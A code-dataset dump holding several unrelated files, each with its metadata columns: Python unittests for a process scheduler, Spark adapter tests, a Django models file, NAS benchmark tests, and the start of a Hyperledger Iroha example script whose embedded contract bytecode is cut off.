self.assert_is_running(proc3) # is already running
self.assert_is_running(proc4)
FAKE_DOCKER[proc4.container_name()] = "RUNNING"
self.assert_is_running(proc5)
FAKE_DOCKER[proc5.container_name()] = "RUNNING"
# = = = = = = = = = = = = = = = = =
# S T E P 6 (do nothing)
# = = = = = = = = = = = = = = = = =
CUR_TIME = 300 + 60 * 60 * 3
scheduler.scheduling_step(list(FAKE_DOCKER.keys()), current_time_in_s=CUR_TIME)
self.assertEqual(2, len(scheduler.STAGING_QUEUE))
self.assertEqual(3, len(scheduler.RUNNING_QUEUE))
self.assert_is_staging(proc1)
self.assert_is_staging(proc2)
self.assert_is_running(proc3)
self.assert_is_running(proc4)
self.assert_is_running(proc5)
# = = = = = = = = = = = = = = = = =
# S T E P 7 (schedule a new process)
# = = = = = = = = = = = = = = = = =
# current status:
# RUNNING: [p3, p4, p5]
# STAGING: [p1(2x), p2(2x)]
CUR_TIME += 150
proc6 = scheduler.add_process_to_staging(
{"cpus": 5, "gpus": 1, "memory": "10g"}, cur_time_in_s=CUR_TIME
)
self.assertEqual(3, len(scheduler.STAGING_QUEUE))
self.assertEqual(3, len(scheduler.RUNNING_QUEUE))
self.assert_is_staging(proc1)
self.assert_is_staging(proc2)
self.assert_is_staging(proc6)
self.assert_is_running(proc3)
self.assert_is_running(proc4)
self.assert_is_running(proc5)
CUR_TIME += 5
scheduler.scheduling_step(list(FAKE_DOCKER.keys()), current_time_in_s=CUR_TIME)
# proc3 has to be killed as we can now fit a new process onto the system
# schedule proc6
self.assertEqual(3, len(scheduler.STAGING_QUEUE))
self.assertEqual(3, len(scheduler.RUNNING_QUEUE))
self.assert_is_staging(proc1)
self.assert_is_staging(proc2)
self.assert_is_staging(proc3)
self.assert_is_running(proc4)
self.assert_is_running(proc5)
self.assert_is_running(proc6)
FAKE_DOCKER[proc6.container_name()] = "RUNNING"
# current status:
# RUNNING: [p4, p5, p6]
# STAGING: [p1(2x), p2(2x), p3]
# = = = = = = = = = = = = = = = = =
# S T E P 8 (do nothing)
# = = = = = = = = = = = = = = = = =
# RUNNING: [p4, p5, p6]
# STAGING: [p1(2x), p2(2x), p3]
CUR_TIME += 50
scheduler.scheduling_step(list(FAKE_DOCKER.keys()), current_time_in_s=CUR_TIME)
self.assertEqual(3, len(scheduler.STAGING_QUEUE))
self.assertEqual(3, len(scheduler.RUNNING_QUEUE))
self.assert_is_staging(proc1)
self.assert_is_staging(proc2)
self.assert_is_staging(proc3)
self.assert_is_running(proc4)
self.assert_is_running(proc5)
self.assert_is_running(proc6)
# = = = = = = = = = = = = = = = = =
# S T E P 9 (kill p5 & p2)
# = = = = = = = = = = = = = = = = =
# RUNNING: [p4, p5, p6]
# STAGING: [p1(2x), p2(2x), p3]
scheduler.schedule_uid_for_killing(proc5.uid)
scheduler.schedule_uid_for_killing(proc2.uid)
self.assertEqual(2, len(scheduler.KILLING_QUEUE))
CUR_TIME += 50
scheduler.scheduling_step(list(FAKE_DOCKER.keys()), current_time_in_s=CUR_TIME)
self.assertEqual(0, len(scheduler.KILLING_QUEUE))
self.assertEqual(1, len(scheduler.STAGING_QUEUE))
self.assertEqual(3, len(scheduler.RUNNING_QUEUE))
self.assert_is_staging(proc1)
self.assert_is_gone(proc2)
self.assert_is_running(proc3)
FAKE_DOCKER[proc3.container_name()] = "RUNNING"
self.assert_is_running(proc4)
self.assert_is_gone(proc5)
self.assert_is_running(proc6)
# current status
# RUNNING: [p4, p3, p6]
# STAGING: [p1(2x)]
CUR_TIME += 60 * 56 # barely exceed the limit for one!
# no re-scheduling is possible yet!
scheduler.scheduling_step(list(FAKE_DOCKER.keys()), current_time_in_s=CUR_TIME)
self.assertEqual(0, len(scheduler.KILLING_QUEUE))
self.assertEqual(1, len(scheduler.STAGING_QUEUE))
self.assertEqual(3, len(scheduler.RUNNING_QUEUE))
self.assert_is_staging(proc1)
self.assert_is_running(proc3)
self.assert_is_running(proc4)
self.assert_is_running(proc6)
# = = = = = = = = = = = = = = = = =
# S T E P 10 (reshedule some)
# = = = = = = = = = = = = = = = = =
CUR_TIME += 60 * 3
scheduler.scheduling_step(list(FAKE_DOCKER.keys()), current_time_in_s=CUR_TIME)
self.assertEqual(0, len(scheduler.KILLING_QUEUE))
self.assertEqual(2, len(scheduler.STAGING_QUEUE))
self.assertEqual(2, len(scheduler.RUNNING_QUEUE))
self.assert_is_running(proc1)
FAKE_DOCKER[proc1.container_name()] = "RUNNING"
self.assert_is_running(proc3)
self.assert_is_staging(proc4)
self.assert_is_staging(proc6)
# RUNNING: [p3, p1(2x)]
# STAGING: [p4, p6]
# = = = = = = = = = = = = = = = = =
# S T E P 11 (reshedule some)
# = = = = = = = = = = = = = = = = =
CUR_TIME += 60 * 3
scheduler.scheduling_step(list(FAKE_DOCKER.keys()), current_time_in_s=CUR_TIME)
# for proc, _ in scheduler.RUNNING_QUEUE:
# print(proc.running_time_in_h(CUR_TIME), proc.may_be_killed(CUR_TIME))
self.assert_is_running(proc1)
self.assert_is_running(proc3)
self.assert_is_staging(proc4)
self.assert_is_staging(proc6)
# RUNNING: [p3, p1(2x)]
# STAGING: [p4, p6]
# = = = = = = = = = = = = = = = = =
# S T E P 11 (reshedule some)
# = = = = = = = = = = = = = = = = =
CUR_TIME += 60 * 1 * 60
scheduler.scheduling_step(list(FAKE_DOCKER.keys()), current_time_in_s=CUR_TIME)
self.assertEqual(0, len(scheduler.KILLING_QUEUE))
self.assertEqual(1, len(scheduler.STAGING_QUEUE))
self.assertEqual(3, len(scheduler.RUNNING_QUEUE))
# RUNNING: [p3, p4, p6]
# STAGING: [p1(2x)]
self.assert_is_staging(proc1)
self.assert_is_running(proc3)
self.assert_is_running(proc4)
self.assert_is_running(proc6)
FAKE_DOCKER[proc4.container_name()] = "RUNNING"
FAKE_DOCKER[proc6.container_name()] = "RUNNING"
# current status:
# RUNNING: [p3, p4, p6]
# STAGING: [p1(2x)]
# = = = = = = = = = = = = = = = = =
# S T E P 12 (reshedule some)
# = = = = = = = = = = = = = = = = =
# request to kill p6 & p1
# p4 & p6 kill themselves before!
# add p7(3x) and p8
del FAKE_DOCKER[proc4.container_name()]
del FAKE_DOCKER[proc6.container_name()]
CUR_TIME += 60
scheduler.schedule_uid_for_killing(proc6.uid)
scheduler.schedule_uid_for_killing(proc1.uid)
proc7 = scheduler.add_process_to_staging(
{"cpus": 5, "gpus": 3, "memory": "10g"}, cur_time_in_s=CUR_TIME - 10
)
proc8 = scheduler.add_process_to_staging(
{"cpus": 5, "gpus": 1, "memory": "10g"}, cur_time_in_s=CUR_TIME
)
self.assertEqual(2, len(scheduler.KILLING_QUEUE))
self.assertEqual(3, len(scheduler.STAGING_QUEUE))
self.assertEqual(3, len(scheduler.RUNNING_QUEUE))
CUR_TIME += 5
scheduler.scheduling_step(list(FAKE_DOCKER.keys()), current_time_in_s=CUR_TIME)
self.assertEqual(0, len(scheduler.KILLING_QUEUE))
self.assertEqual(2, len(scheduler.STAGING_QUEUE))
self.assertEqual(1, len(scheduler.RUNNING_QUEUE))
self.assert_is_gone(proc1)
self.assert_is_staging(proc3)
self.assert_is_gone(proc4)
self.assert_is_gone(proc6)
self.assert_is_running(proc7)
self.assert_is_staging(proc8)
# = = = = = = = = = = = = = = = = =
# S T E P 13 (reshedule some)
# = = = = = = = = = = = = = = = = =
# add proc9 without GPU req
CUR_TIME += 10
proc9 = scheduler.add_process_to_staging(
{"cpus": 1, "gpus": 0, "memory": "1g"}, cur_time_in_s=CUR_TIME
)
self.assertEqual(0, len(scheduler.KILLING_QUEUE))
self.assertEqual(3, len(scheduler.STAGING_QUEUE))
self.assertEqual(1, len(scheduler.RUNNING_QUEUE))
CUR_TIME += 5
scheduler.scheduling_step(list(FAKE_DOCKER.keys()), current_time_in_s=CUR_TIME)
self.assertEqual(0, len(scheduler.KILLING_QUEUE))
self.assertEqual(2, len(scheduler.STAGING_QUEUE))
self.assertEqual(2, len(scheduler.RUNNING_QUEUE))
self.assert_is_staging(proc3)
self.assert_is_running(proc7)
self.assert_is_staging(proc8)
self.assert_is_running(proc9)
# print_running_queue(scheduler, CUR_TIME)
self.assertEqual(96, len(scheduler.FREE_IDS))
self.assertEqual(4, len(scheduler.USED_IDS))
def print_running_queue(scheduler, CUR_TIME):
for proc, gpus in scheduler.RUNNING_QUEUE:
print(
f"{proc.uid} -> {proc.may_be_killed(CUR_TIME)} ({proc.running_time_in_h(CUR_TIME)}), {gpus}"
)
if __name__ == "__main__":
unittest.main()
| 40.514599
| 104
| 0.618503
| 2,720
| 22,202
| 4.792647
| 0.070956
| 0.097806
| 0.055232
| 0.082694
| 0.890304
| 0.865603
| 0.836376
| 0.802777
| 0.788816
| 0.774778
| 0
| 0.031064
| 0.250383
| 22,202
| 547
| 105
| 40.588665
| 0.752208
| 0.124133
| 0
| 0.720222
| 0
| 0.00277
| 0.025691
| 0.005014
| 0
| 0
| 0
| 0
| 0.556787
| 1
| 0.033241
| false
| 0
| 0.01385
| 0
| 0.049862
| 0.00554
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
89272f57191c95d096a46b200ec10c9c47493122
| 1,629
|
py
|
Python
|
tests/ml/test_adapter.py
|
MichaelisTrofficus/elephas
|
579165865787e28d7b842af881ca3b6aa65e98ea
|
[
"MIT"
] | 1,674
|
2015-08-17T03:54:10.000Z
|
2022-03-29T12:07:43.000Z
|
tests/ml/test_adapter.py
|
MichaelisTrofficus/elephas
|
579165865787e28d7b842af881ca3b6aa65e98ea
|
[
"MIT"
] | 183
|
2015-08-25T11:34:21.000Z
|
2022-03-22T15:33:59.000Z
|
tests/ml/test_adapter.py
|
MichaelisTrofficus/elephas
|
579165865787e28d7b842af881ca3b6aa65e98ea
|
[
"MIT"
] | 359
|
2015-08-21T20:37:48.000Z
|
2022-03-23T15:41:12.000Z
|
import numpy as np
from elephas.ml import adapter
def test_to_data_frame(spark_context):
features = np.ones((2, 10))
labels = np.asarray([[2.0], [1.0]])
data_frame = adapter.to_data_frame(
spark_context, features, labels, categorical=False)
assert data_frame.count() == 2
def test_to_data_frame_cat(spark_context):
features = np.ones((2, 10))
labels = np.asarray([[0, 0, 1.0], [0, 1.0, 0]])
data_frame = adapter.to_data_frame(
spark_context, features, labels, categorical=True)
assert data_frame.count() == 2
def test_from_data_frame(spark_context):
features = np.ones((2, 10))
labels = np.asarray([[2.0], [1.0]]).reshape((2,))
data_frame = adapter.to_data_frame(
spark_context, features, labels, categorical=False)
x, y = adapter.from_data_frame(data_frame, categorical=False)
assert features.shape == x.shape
assert labels.shape == y.shape
def test_from_data_frame_cat(spark_context):
features = np.ones((2, 10))
labels = np.asarray([[0, 0, 1.0], [0, 1.0, 0]])
data_frame = adapter.to_data_frame(
spark_context, features, labels, categorical=True)
x, y = adapter.from_data_frame(data_frame, categorical=True, nb_classes=3)
assert features.shape == x.shape
assert labels.shape == y.shape
def test_df_to_simple_rdd(spark_context):
features = np.ones((2, 10))
labels = np.asarray([[2.0], [1.0]]).reshape((2,))
data_frame = adapter.to_data_frame(
spark_context, features, labels, categorical=False)
rdd = adapter.df_to_simple_rdd(data_frame, False)
assert rdd.count() == 2
| 29.089286
| 78
| 0.674647
| 245
| 1,629
| 4.257143
| 0.159184
| 0.181208
| 0.191755
| 0.14094
| 0.880153
| 0.863854
| 0.861937
| 0.808245
| 0.808245
| 0.727709
| 0
| 0.036925
| 0.18539
| 1,629
| 55
| 79
| 29.618182
| 0.749058
| 0
| 0
| 0.675676
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.189189
| 1
| 0.135135
| false
| 0
| 0.054054
| 0
| 0.189189
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
893dbdea6110e4e6062451bbec8f8912b9de549a
| 2,349
|
py
|
Python
|
inventory/models.py
|
shreysway/Dubai-Hospital
|
0333028f11e65430ff45ca17db4545d2d648c0be
|
[
"MIT"
] | null | null | null |
inventory/models.py
|
shreysway/Dubai-Hospital
|
0333028f11e65430ff45ca17db4545d2d648c0be
|
[
"MIT"
] | 3
|
2021-03-19T11:05:51.000Z
|
2021-06-09T19:25:54.000Z
|
inventory/models.py
|
shreysway/Dubai-Hospital
|
0333028f11e65430ff45ca17db4545d2d648c0be
|
[
"MIT"
] | null | null | null |
from django.db import models
# Create your models here.
class Device(models.Model):
Status = models.CharField(max_length=200, blank=False)
DoctorName = models.CharField(max_length=200)
TokenNo = models.CharField(max_length=50)
issues = models.CharField(max_length=50)
class Meta:
abstract = True
def __str__(self):
return 'Status: {0} TokenNo: {1}'.format(self.Status, self.TokenNo)
class Desktops(Device):
pass
class Laptops(Device):
pass
class Mobiles(Device):
pass
# class Desktops(models.Model):
# status = models.CharField(max_length=200, blank=False)
# doctorname = models.IntegerField()
#
# roomno = (
# ('SOLD', 'Item already purchased'),
# ('AVAILABLE', 'Item ready to be purchased'),
# ('RESTOCKING', 'Item restocking in few days')
# )
#
# status = models.CharField(max_length=10, roomno=roomno, default='SOLD')
# issues = models.CharField(max_length=50, default="No Issues")
#
# def __str__(self):
# return 'status: {0} doctorname: {1}'.format(self.status, self.doctorname)
#
#
# class Laptops(models.Model):
# status = models.CharField(max_length=200, blank=False)
# doctorname = models.IntegerField()
#
# roomno = (
# ('SOLD', 'Item already purchased'),
# ('AVAILABLE', 'Item ready to be purchased'),
# ('RESTOCKING', 'Item restocking in few days')
# )
#
# status = models.CharField(max_length=10, roomno=roomno, default='SOLD')
# issues = models.CharField(max_length=50, default="No Issues")
#
# def __str__(self):
# return 'status: {0} doctorname: {1}'.format(self.status, self.doctorname)
#
#
# class Mobiles(models.Model):
# status = models.CharField(max_length=200, blank=False)
# doctorname = models.IntegerField()
#
# roomno = (
# ('SOLD', 'Item already purchased'),
# ('AVAILABLE', 'Item ready to be purchased'),
# ('RESTOCKING', 'Item restocking in few days')
# )
#
# status = models.CharField(max_length=10, roomno=roomno, default='SOLD')
# issues = models.CharField(max_length=50, default="No Issues")
#
# def __str__(self):
# return 'status: {0} doctorname: {1}'.format(self.status, self.doctorname)
| 30.115385
| 84
| 0.616858
| 260
| 2,349
| 5.461538
| 0.203846
| 0.137324
| 0.164789
| 0.219718
| 0.865493
| 0.817606
| 0.778873
| 0.778873
| 0.778873
| 0.778873
| 0
| 0.0218
| 0.238399
| 2,349
| 77
| 85
| 30.506494
| 0.77194
| 0.707961
| 0
| 0.1875
| 0
| 0
| 0.043011
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.0625
| false
| 0.1875
| 0.0625
| 0.0625
| 0.75
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 9
|
8964100923a118137f3c58844605188df91fa8f4
| 3,984
|
py
|
Python
|
test/test_tabular_benchmarks/test_tabular_nas_cifar10.py
|
haconline/nas_benchmarks
|
1b09906ba3f522f15766b75643423acccd9db3a5
|
[
"BSD-3-Clause"
] | 76
|
2019-02-13T00:47:50.000Z
|
2022-02-09T00:02:23.000Z
|
test/test_tabular_benchmarks/test_tabular_nas_cifar10.py
|
haconline/nas_benchmarks
|
1b09906ba3f522f15766b75643423acccd9db3a5
|
[
"BSD-3-Clause"
] | 10
|
2019-01-30T14:18:37.000Z
|
2021-11-20T01:29:38.000Z
|
test/test_tabular_benchmarks/test_tabular_nas_cifar10.py
|
haconline/nas_benchmarks
|
1b09906ba3f522f15766b75643423acccd9db3a5
|
[
"BSD-3-Clause"
] | 29
|
2018-03-14T22:27:30.000Z
|
2022-03-06T23:01:48.000Z
|
import unittest
from tabular_benchmarks import NASCifar10A, NASCifar10B, NASCifar10C
class TestNASCifar10A(unittest.TestCase):
def setUp(self):
self.b = NASCifar10A(data_dir="./")
def test_fix_configuration(self):
cs = self.b.get_configuration_space()
config = cs.sample_configuration()
# inception architecture
config["op_node_0"] = 'conv1x1-bn-relu'
config["op_node_1"] = 'conv3x3-bn-relu'
config["op_node_2"] = 'conv3x3-bn-relu'
config["op_node_3"] = 'conv3x3-bn-relu'
config["op_node_4"] = 'maxpool3x3'
for i in range(21):
config["edge_%d" % i] = 0
config["edge_0"] = 1
config["edge_1"] = 1
config["edge_2"] = 1
config["edge_4"] = 1
config["edge_10"] = 1
config["edge_14"] = 1
config["edge_15"] = 1
config["edge_19"] = 1
config["edge_20"] = 1
max_epochs = 108
y, cost = self.b.objective_function(config, max_epochs)
mean_test_error = self.b.y_star_test + self.b.get_results()['regret_test'][0]
mean_test_acc = 1 - mean_test_error
assert mean_test_acc == 0.9308560291926066
def test_random_sampling(self):
config = self.b.get_configuration_space().sample_configuration()
self.b.objective_function(config)
class TestNASCifar10B(unittest.TestCase):
def setUp(self):
self.b = NASCifar10B(data_dir="./")
def test_fix_configuration(self):
cs = self.b.get_configuration_space()
config = cs.sample_configuration()
# inception architecture
config["op_node_0"] = 'conv1x1-bn-relu'
config["op_node_1"] = 'conv3x3-bn-relu'
config["op_node_2"] = 'conv3x3-bn-relu'
config["op_node_3"] = 'conv3x3-bn-relu'
config["op_node_4"] = 'maxpool3x3'
config["edge_0"] = 0
config["edge_1"] = 1
config["edge_2"] = 2
config["edge_3"] = 4
config["edge_4"] = 10
config["edge_5"] = 14
config["edge_6"] = 15
config["edge_7"] = 19
config["edge_8"] = 20
max_epochs = 108
y, cost = self.b.objective_function(config, max_epochs)
mean_test_error = self.b.y_star_test + self.b.get_results()['regret_test'][0]
mean_test_acc = 1 - mean_test_error
assert mean_test_acc == 0.9308560291926066
def test_random_sampling(self):
config = self.b.get_configuration_space().sample_configuration()
self.b.objective_function(config)
class TestNASCifar10C(unittest.TestCase):
def setUp(self):
self.b = NASCifar10C(data_dir="./")
def test_fix_configuration(self):
cs = self.b.get_configuration_space()
config = cs.sample_configuration()
# inception architecture
config["op_node_0"] = 'conv1x1-bn-relu'
config["op_node_1"] = 'conv3x3-bn-relu'
config["op_node_2"] = 'conv3x3-bn-relu'
config["op_node_3"] = 'conv3x3-bn-relu'
config["op_node_4"] = 'maxpool3x3'
from tabular_benchmarks.nas_cifar10 import VERTICES
for i in range(VERTICES * (VERTICES - 1) // 2):
config["edge_%d" % i] = 0
config["edge_0"] = 1
config["edge_1"] = 1
config["edge_2"] = 1
config["edge_4"] = 1
config["edge_10"] = 1
config["edge_14"] = 1
config["edge_15"] = 1
config["edge_19"] = 1
config["edge_20"] = 1
config["num_edges"] = 9
max_epochs = 108
y, cost = self.b.objective_function(config, max_epochs)
mean_test_error = self.b.y_star_test + self.b.get_results()['regret_test'][0]
mean_test_acc = 1 - mean_test_error
assert mean_test_acc == 0.9308560291926066
def test_random_sampling(self):
config = self.b.get_configuration_space().sample_configuration()
self.b.objective_function(config)
if __name__ == '__main__':
unittest.main()
| 30.412214
| 85
| 0.609438
| 516
| 3,984
| 4.410853
| 0.160853
| 0.127417
| 0.082162
| 0.073814
| 0.836995
| 0.836995
| 0.836995
| 0.783392
| 0.783392
| 0.783392
| 0
| 0.070241
| 0.260291
| 3,984
| 130
| 86
| 30.646154
| 0.70207
| 0.017068
| 0
| 0.765957
| 0
| 0
| 0.150051
| 0
| 0
| 0
| 0
| 0
| 0.031915
| 1
| 0.095745
| false
| 0
| 0.031915
| 0
| 0.159574
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
898ba14cbea7d24028e7d55b03da48b15fead0cd
| 14,881
|
py
|
Python
|
example/burrow_integration/get_transactions.py
|
Insafin/iroha
|
5e3c3252b2a62fa887274bdf25547dc264c10c26
|
[
"Apache-2.0"
] | 1,467
|
2016-10-25T12:27:19.000Z
|
2022-03-28T04:32:05.000Z
|
example/burrow_integration/get_transactions.py
|
Insafin/iroha
|
5e3c3252b2a62fa887274bdf25547dc264c10c26
|
[
"Apache-2.0"
] | 2,366
|
2016-10-25T10:07:57.000Z
|
2022-03-31T22:03:24.000Z
|
example/burrow_integration/get_transactions.py
|
Insafin/iroha
|
5e3c3252b2a62fa887274bdf25547dc264c10c26
|
[
"Apache-2.0"
] | 662
|
2016-10-26T04:41:22.000Z
|
2022-03-31T04:15:02.000Z
|
import os
import binascii
from iroha import IrohaCrypto
from iroha import Iroha, IrohaGrpc
from iroha.primitive_pb2 import can_set_my_account_detail
from iroha.queries_pb2 import *
import sys
from Crypto.Hash import keccak
import integration_helpers
import json
if sys.version_info[0] < 3:
raise Exception("Python 3 or a more recent version is required.")
# Here is the information about the environment and admin account information:
IROHA_HOST_ADDR = os.getenv("IROHA_HOST_ADDR", "127.0.0.1")
IROHA_PORT = os.getenv("IROHA_PORT", "50051")
ADMIN_ACCOUNT_ID = os.getenv("ADMIN_ACCOUNT_ID", "admin@test")
ADMIN_PRIVATE_KEY = os.getenv(
"ADMIN_PRIVATE_KEY",
"f101537e319568c765b2cc89698325604991dca57b9716b58016b253506cab70",
)
COIN = 'coin#test'
iroha = Iroha(ADMIN_ACCOUNT_ID)
net = IrohaGrpc("{}:{}".format(IROHA_HOST_ADDR, IROHA_PORT))
test_private_key = IrohaCrypto.private_key()
test_public_key = IrohaCrypto.derive_public_key(test_private_key).decode("utf-8")
@integration_helpers.trace
def send_transaction_and_print_status(transaction):
IrohaCrypto.sign_transaction(transaction, ADMIN_PRIVATE_KEY)
hex_hash = binascii.hexlify(IrohaCrypto.hash(transaction))
print('Transaction hash = {}, creator = {}'.format(
hex_hash, transaction.payload.reduced_payload.creator_account_id))
response = net.send_tx(transaction)
print(response)
for status in net.tx_status_stream(transaction):
print(status)
return hex_hash
@integration_helpers.trace
def create_contract():
bytecode = "608060405234801561001057600080fd5b5073a6abc17819738299b3b2c1ce46d55c74f04e290c6000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506111dd806100746000396000f3fe608060405234801561001057600080fd5b50600436106100575760003560e01c806353b676e71461005c578063ae44f0c21461008c578063bf010d56146100bc578063d4e804ab146100ec578063d8f7441a1461010a575b600080fd5b610076600480360381019061007191906107b7565b61013a565b6040516100839190610d6a565b60405180910390f35b6100a660048036038101906100a19190610800565b6102a6565b6040516100b39190610d6a565b60405180910390f35b6100d660048036038101906100d19190610907565b61041e565b6040516100e39190610d6a565b60405180910390f35b6100f461059f565b6040516101019190610d4f565b60405180910390f35b610124600480360381019061011f9190610a9d565b6105c3565b6040516101319190610d6a565b60405180910390f35b606060008260405160240161014f9190610d8c565b6040516020818303038152906040527f53b676e7000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff19166020820180517bffffffffffffffffffffffffffffffffffffffffffffffffffffffff8381831617835250505050905060008060008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16836040516102169190610d38565b600060405180830381855af49150503d8060008114610251576040519150601f19603f3d011682016040523d82523d6000602084013e610256565b606091505b50915091508161029b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161029290610fa6565b60405180910390fd5b809350505050919050565b6060600086868686866040516024016102c3959493929190610dae565b6040516020818303038152906040527fae44f0c2000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff19166020820180517bffffffffffffffffffffffffffffffffffffffffffffffffffffffff8381831617835250505050905060008060008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168360405161038a9190610d38565b600060405180830381855af49150503d80600081146103c5576040519150601f19603f3d011682016040523d82523d6000602084013e6103ca565b606091505b50915091508161040f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161040690610fa6565b60405180910390fd5b80935050505095945050505050565b606060008989898989898989604051602401610441989796959493929190610e24565b6040516020818303038152906040527fbf010d56000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff19166020820180517bffffffffffffffffffffffffffffffffffffffffffffffffffffffff8381831617835250505050905060008060008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16836040516105089190610d38565b600060405180830381855af49150503d8060008114610543576040519150601f19603f3d011682016040523d82523d6000602084013e610548565b606091505b50915091508161058d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161058490610fa6565b60405180910390fd5b80935050505098975050505050505050565b60008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b606060008a8a8a8a8a8a8a8a8a6040516024016105e899989796959493929190610eda565b6040516020818303038152906040527fd8f7441a000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff19166020820180517bffffffffffffffffffffffffffffffffffffffffffffffffffffffff8381831617835250505050905060008060008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16836040516106af9190610d38565b600060405180830381855af49150503d80600081146106ea576040519150601f19603f3d011682016040523d82523d6000602084013e6106ef565b606091505b509150915081610734576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161072b90610fa6565b60405180910390fd5b8093505050509998505050505050505050565b600061075a61075584610feb565b610fc6565b90508281526020810184848401111561077657610775611138565b5b610781848285611091565b509392505050565b600082601f83011261079e5761079d611133565b5b81356107ae848260208601610747565b91505092915050565b6000602082840312156107cd576107cc611142565b5b600082013567ffffffffffffffff8111156107eb576107ea61113d565b5b6107f784828501610789565b91505092915050565b600080600080600060a0868803121561081c5761081b611142565b5b600086013567ffffffffffffffff81111561083a5761083961113d565b5b61084688828901610789565b955050602086013567ffffffffffffffff8111156108675761086661113d565b5b61087388828901610789565b945050604086013567ffffffffffffffff8111156108945761089361113d565b5b6108a088828901610789565b935050606086013567ffffffffffffffff8111156108c1576108c061113d565b5b6108cd88828901610789565b925050608086013567ffffffffffffffff8111156108ee576108ed61113d565b5b6108fa88828901610789565b9150509295509295909350565b600080600080600080600080610100898b03121561092857610927611142565b5b600089013567ffffffffffffffff8111156109465761094561113d565b5b6109528b828c01610789565b985050602089013567ffffffffffffffff8111156109735761097261113d565b5b61097f8b828c01610789565b975050604089013567ffffffffffffffff8111156109a05761099f61113d565b5b6109ac8b828c01610789565b965050606089013567ffffffffffffffff8111156109cd576109cc61113d565b5b6109d98b828c01610789565b955050608089013567ffffffffffffffff8111156109fa576109f961113d565b5b610a068b828c01610789565b94505060a089013567ffffffffffffffff811115610a2757610a2661113d565b5b610a338b828c01610789565b93505060c089013567ffffffffffffffff811115610a5457610a5361113d565b5b610a608b828c01610789565b92505060e089013567ffffffffffffffff811115610a8157610a8061113d565b5b610a8d8b828c01610789565b9150509295985092959890939650565b60008060008060008060008060006101208a8c031215610ac057610abf611142565b5b60008a013567ffffffffffffffff811115610ade57610add61113d565b5b610aea8c828d01610789565b99505060208a013567ffffffffffffffff811115610b0b57610b0a61113d565b5b610b178c828d01610789565b98505060408a013567ffffffffffffffff811115610b3857610b3761113d565b5b610b448c828d01610789565b97505060608a013567ffffffffffffffff811115610b6557610b6461113d565b5b610b718c828d01610789565b96505060808a013567ffffffffffffffff811115610b9257610b9161113d565b5b610b9e8c828d01610789565b95505060a08a013567ffffffffffffffff811115610bbf57610bbe61113d565b5b610bcb8c828d01610789565b94505060c08a013567ffffffffffffffff811115610bec57610beb61113d565b5b610bf88c828d01610789565b93505060e08a013567ffffffffffffffff811115610c1957610c1861113d565b5b610c258c828d01610789565b9250506101008a013567ffffffffffffffff811115610c4757610c4661113d565b5b610c538c828d01610789565b9150509295985092959850929598565b610c6c8161105f565b82525050565b6000610c7d8261101c565b610c878185611032565b9350610c978185602086016110a0565b610ca081611147565b840191505092915050565b6000610cb68261101c565b610cc08185611043565b9350610cd08185602086016110a0565b80840191505092915050565b6000610ce782611027565b610cf1818561104e565b9350610d018185602086016110a0565b610d0a81611147565b840191505092915050565b6000610d2260278361104e565b9150610d2d82611158565b604082019050919050565b6000610d448284610cab565b915081905092915050565b6000602082019050610d646000830184610c63565b92915050565b60006020820190508181036000830152610d848184610c72565b905092915050565b60006020820190508181036000830152610da68184610cdc565b905092915050565b600060a0820190508181036000830152610dc88188610cdc565b90508181036020830152610ddc8187610cdc565b90508181036040830152610df08186610cdc565b90508181036060830152610e048185610cdc565b90508181036080830152610e188184610cdc565b90509695505050505050565b6000610100820190508181036000830152610e3f818b610cdc565b90508181036020830152610e53818a610cdc565b90508181036040830152610e678189610cdc565b90508181036060830152610e7b8188610cdc565b90508181036080830152610e8f8187610cdc565b905081810360a0830152610ea38186610cdc565b905081810360c0830152610eb78185610cdc565b905081810360e0830152610ecb8184610cdc565b90509998505050505050505050565b6000610120820190508181036000830152610ef5818c610cdc565b90508181036020830152610f09818b610cdc565b90508181036040830152610f1d818a610cdc565b90508181036060830152610f318189610cdc565b90508181036080830152610f458188610cdc565b905081810360a0830152610f598187610cdc565b905081810360c0830152610f6d8186610cdc565b905081810360e0830152610f818185610c